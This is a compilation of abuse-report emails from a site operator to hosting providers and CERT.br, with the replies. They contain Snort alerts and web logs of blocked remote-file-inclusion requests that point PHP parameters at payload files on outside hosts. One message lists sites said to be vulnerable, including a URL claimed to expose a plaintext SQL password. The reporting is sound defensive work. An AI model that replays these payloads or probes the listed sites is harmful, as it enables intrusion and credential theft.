--------------------------------------------------------------------------------------------------- --------------------------------------------------------------------------------------------------- --------------------------------------------------------------------------------------------------- --------------------------------------------------------------------------------------------------- Flag this message [ThePlanetAbuse-C34160139F] SECURITY_ALERT 74.54.60.50 Saturday, February 21, 2009 11:31 AM From: "abuse@theplanet.com" Add sender to Contacts To: rmccurdyjob@yahoo.com Reference: [ThePlanetAbuse-C34160139F] To Whom It May Concern, We appreciate you bringing this matter to our attention. This issue is currently being investigated. Due to privacy policies we will most likely not be able to provide you with information regarding the outcome of our investigation. -- Regards, Abuse Department The Planet abuse@theplanet.com http://www.theplanet.com/legal/ ==== Original Message ==== MIME element (text/plain) From: Robert McCurdy [mailto:root@rmccurdy.com] Sent: Saturday, February 21, 2009 9:57 AM To: The Planet NOC Subject: SECURITY_ALERT WARNING: This is a security alert from rmccurdy.com 74.54.60.50 on your network MAY be compromised any questions please contact rmccurdyjob@yahoo.com Here are some replies from this service http://rmccurdy.com/scripts/replies.txt here are more triggers from this ip All times are EST ( UTC -5) 02/21-10:07:43.088828 [**] [1:2002:8] WEB-PHP remote include path [**] [Classification: Web Application Attack] [Priority: 1] {TCP} 74.54.60.50:35016 -> rmccurdy.com:80 02/21-10:07:43.088828 [**] [1:2301:5] WEB-PHP Advanced Poll booth.php access [**] [Classification: access to a potentially vulnerable web application] [Priority: 2] {TCP} 74.54.60.50:35016 -> rmccurdy.com:80 Here are web server logs from that ip if any 74.54.60.50 - - [21/Feb/2009:10:07:43 -0500] "GET //booth.php?include_path=http://bialasinski.com//xoops_lib/modules/prote ctor/gif/ok.txt?? HTTP/1.1" 403 211 "-" "libwww-perl/5.812" --------------------------------------------------------------------------------------------------- [spry.com #1005051] SECURITY_ALERT Monday, February 9, 2009 5:29 PM From: "Support via RT" Add sender to Contacts To: rmccurdyjob@yahoo.com Hello, Thank you for contacting the Spry Abuse department. We have already received similar notifications and our client has removed the offending user from their system. -- --------------------------------------------------------------------------------------------------- Flag this message [domainfactory.de #1877493] SECURITY ALERT Tuesday, February 10, 2009 5:21 AM From: "Tobias Theisselmann via RT" Add sender to Contacts To: rmccurdyjob@yahoo.com Dear Sirs, Thank you for contacting us via abuse@df.eu. We have verified your complaint and wish to inform you of the current status. Please note that only the parts marked with an X are relevant for this case. ---------------------------------------------------------------------- [x] - The offending account/script has been blocked/terminated. [ ] - User has received a written warning concerning this issue. [ ] - User has been asked to provide a written statement concerning this issue. ---------------------------------------------------------------------- ---------------------------------------------------------------------------------------------------------- http://evga.ru/config/.svn/tmp/tempfile.tmp may want check that site out as plain text password to SQL server ... also want to checkout the flowing sites for security issues: http://www.mtya.ru/forum/index.php?act=Print&client=wordr&f=13&t=537 http://www.ormin.ru/index.php?option=com_content&view=article&id=48&Itemid=54 http://www.sacred-baikal.ru/forum/showthread.php?p=2024 http://garant-shoes.ru/index.php?page=40 http://www.go2marka.ru/index.php?option=com_content&task=view&id=26&Itemid= http://delfon.ru/sounds_mp3.php?action=viewsexe&id=90149 --- On Fri, 2/20/09, 1Gb.ru support, Dmitry Bernikov wrote: From: 1Gb.ru support, Dmitry Bernikov Subject: RE: SECURITY_ALERT To: rmccurdyjob@yahoo.com Date: Friday, February 20, 2009, 9:09 AM Hello. ip 81.176.226.186 belongs to shared hosting, it holds thousands of different sites and we have no possibility to identify the exact resource. We will try to find out, but will not guarantee we find it. You may just block this ip and you will not loose any visitors, or just try to eliminate vulnerability of your scripts. -- ...... ......... 1Gb.ru, support@1gb.ru .../....: +7 (495) 221-1152, ICQ 285-466-973 .........., ... ...... .......... . ...... ....... .......... From: robert mccurdy [mailto:rmccurdyjob@yahoo.com] Sent: Friday, February 20, 2009 4:40 PM To: 1Gb.ru Support Team, Alexey Vlasov Subject: Re: SECURITY_ALERT You don't get it ... that sever is trying to attack mine you need to fix it 81.176.226.186 - - [28/Nov/2008:01:03:26 -0500] "GET /scripts/downloaded/order.php?ln=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 403 230 "-" "libwww-perl/5.805" 81.176.226.186 - - [2 ------------------------------------------------------------------------ Flag this message Re: SECURITY_ALERT Thursday, February 11, 2010 10:01 AM From: "CERT.br" Add sender to Contacts To: "Charlie Root" , sistemas@intelignet.com.br, rmccurdyjob@yahoo.com, inforwave@inforwave.com.br Cc: cert@cert.br Hello, I'm forwarding your email to the proper contacts for this network so they can investigate this incident. Thank you for reporting this incident, -- Aritana Pinheiro Falconi CERT.br http://www.cert.br/ ----- Original message ----- To: cert@cert.br Subject: SECURITY_ALERT Message-Id: <20100211020431.EBE47B828@rmccurdy.com> Date: Wed, 10 Feb 2010 21:04:31 -0500 (EST) From: root@charter.net (Charlie Root) WARNING: This is a security alert from rmccurdy.com 201.36.173.93 on your network MAY be compromised. This could be a false possitive please review the message and notify me if you have any questions rmccurdyjob@yahoo.com Here are some replies from this service http://rmccurdy.com/scripts/replies.txt here are more triggers from this ip All times are EST ( UTC -5) 02/02-01:50:48.976072 [**] [1:2342:4] WEB-PHP DCP-Portal remote file include lib script attempt [**] [Classification: Web Application Attack] [Priority: 1] {TCP} 201.36.173.93:46602 -> rmccurdy.com:80 02/02-01:50:48.990087 [**] [1:2342:4] WEB-PHP DCP-Portal remote file include lib script attempt [**] [Classification: Web Application Attack] [Priority: 1] {TCP} 201.36.173.93:46601 -> rmccurdy.com:80 02/02-01:50:52.206467 [**] [1:2342:4] WEB-PHP DCP-Portal remote file include lib script attempt [**] [Classification: Web Application Attack] [Priority: 1] {TCP} 201.36.173.93:46603 -> rmccurdy.com:80 02/02-01:50:52.231370 [**] [1:2342:4] WEB-PHP DCP-Portal remote file include lib script attempt [**] [Classification: Web Application Attack] [Priority: 1] {TCP} 201.36.173.93:46604 -> rmccurdy.com:80 02/02-02:16:19.552185 [**] [1:2002:8] WEB-PHP remote include path [**] [Classification: Web Application Attack] [Priority: 1] {TCP} 201.36.173.93:55541 -> rmccurdy.com:80 02/02-02:16:19.558743 [**] [1:2002:8] WEB-PHP remote include path [**] [Classification: Web Application Attack] [Priority: 1] {TCP} 201.36.173.93:55539 -> rmccurdy.com:80 02/02-02:16:19.559767 [**] [1:2002:8] WEB-PHP remote include path [**] [Classification: Web Application Attack] [Priority: 1] {TCP} 201.36.173.93:55538 -> rmccurdy.com:80 02/02-02:16:19.565856 [**] [1:2002:8] WEB-PHP remote include path [**] [Classification: Web Application Attack] [Priority: 1] {TCP} 201.36.173.93:55540 -> rmccurdy.com:80 02/02-06:42:00.489682 [**] [1:2002:8] WEB-PHP remote include path [**] [Classification: Web Application Attack] [Priority: 1] {TCP} 201.36.173.93:41973 -> rmccurdy.com:80 02/02-06:42:00.499980 [**] [1:2002:8] WEB-PHP remote include path [**] [Classification: Web Application Attack] [Priority: 1] {TCP} 201.36.173.93:41972 -> rmccurdy.com:80 02/02-06:42:00.503084 [**] [1:2002:8] WEB-PHP remote include path [**] [Classification: Web Application Attack] [Priority: 1] {TCP} 201.36.173.93:41974 -> rmccurdy.com:80 02/02-06:42:00.505947 [**] [1:2002:8] WEB-PHP remote include path [**] [Classification: Web Application Attack] [Priority: 1] {TCP} 201.36.173.93:41975 -> rmccurdy.com:80 Here are web server logs from that ip if any 201.36.173.93 - - [02/Feb/2010:06:42:00 -0500] "GET /scripts//modules/4nAlbum/public/displayCategory.php?basepath=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 403 253 "-" "Mozilla/5.0" 201.36.173.93 - - [03/Feb/2010:19:10:38 -0500] "GET /scripts//GradeMap/index.php?page=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 403 229 "-" "Mozilla/5.0" 201.36.173.93 - - [03/Feb/2010:19:10:38 -0500] "GET /scripts/downloaded/dork//GradeMap/index.php?page=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 403 245 "-" "Mozilla/5.0" 201.36.173.93 - - [03/Feb/2010:19:10:38 -0500] "GET /scripts/downloaded//GradeMap/index.php?page=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 403 240 "-" "Mozilla/5.0" 201.36.173.93 - - [03/Feb/2010:19:10:41 -0500] "GET //GradeMap/index.php?page=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 403 220 "-" "Mozilla/5.0" 201.36.173.93 - - [04/Feb/2010:12:23:14 -0500] "GET /scripts/downloaded/dork/joomla/index.php?option=com_restaurante&task=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 403 242 "-" "Mozilla/5.0" 201.36.173.93 - - [04/Feb/2010:12:23:14 -0500] "GET /scripts/joomla/index.php?option=com_restaurante&task=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 403 226 "-" "Mozilla/5.0" 201.36.173.93 - - [04/Feb/2010:12:23:17 -0500] "GET /joomla/index.php?option=com_restaurante&task=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 403 218 "-" "Mozilla/5.0" 201.36.173.93 - - [04/Feb/2010:12:23:19 -0500] "GET /scripts/downloaded/joomla/index.php?option=com_restaurante&task=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 403 237 "-" "Mozilla/5.0" 66.249.67.7 - - [10/Feb/2010:12:53:30 -0500] "GET /snortstats/201/36/173/src201.36.173.93.html HTTP/1.1" 200 10833 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"